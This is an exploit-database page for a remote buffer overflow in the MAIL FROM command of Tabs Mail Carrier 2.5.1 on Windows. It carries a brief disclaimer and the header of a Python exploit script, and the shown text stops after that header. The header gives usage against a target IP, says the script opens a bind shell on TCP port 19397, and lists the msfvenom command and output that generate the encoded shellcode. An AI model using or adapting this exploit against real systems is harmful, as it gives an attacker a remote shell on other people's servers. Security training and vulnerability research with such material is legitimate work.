Mail carrier 2.5.1 mail from buffer overflow Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-03-15 |
Type : remote |
Platform : windows
This exploit / vulnerability Mail carrier 2.5.1 mail from buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow
# Date: March 14, 2019
# Exploit Author: Joseph McDonagh
# Vendor Homepage: N/A
# Software Link: N/A
# Version: Mail Carrier 2.5.1
# Tested on: Windows Vista Home Basic SP2
# CVE: None
#!/usr/bin/python
#
# This script started from PWK, Chapter 6
# I am re-purposing it Tabs Mail Carrier 2.5.1 OSCE practice
# During testing, I found the MAIL FROM: is also vulnerable to Buffer Overflow
# Thanks to the original authors of the EHLO parameter, gave me the
starting point and nudge I needed
#
# Usage ./tabs_mail.pwn.py 192.168.1.66
# Bind shell on TCP port 19397
# Tested on Windows Vista Home Basic SP 2
#msfvenom -p windows/shell_bind_tcp LPORT=19397 -b='\x00' -e
x86/shikata_ga_nai -f py | sed 's/buf/pay/g'
#[-] No platform was selected, choosing Msf::Module::Platform::Windows
from the payload
#[-] No arch selected, selecting arch: x86 from the payload
#Found 1 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of py file: 1710 bytes